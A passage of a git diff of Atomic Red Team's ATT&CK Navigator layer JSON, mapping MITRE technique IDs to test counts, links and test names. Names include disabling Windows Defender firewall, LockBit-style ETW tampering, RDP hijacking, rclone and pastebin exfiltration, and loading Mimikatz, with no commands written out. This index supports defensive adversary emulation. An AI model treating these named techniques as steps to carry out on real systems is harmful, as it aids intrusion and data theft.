with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":9,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 358de0dc45..1a1abbbf59 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":48,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":50,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View 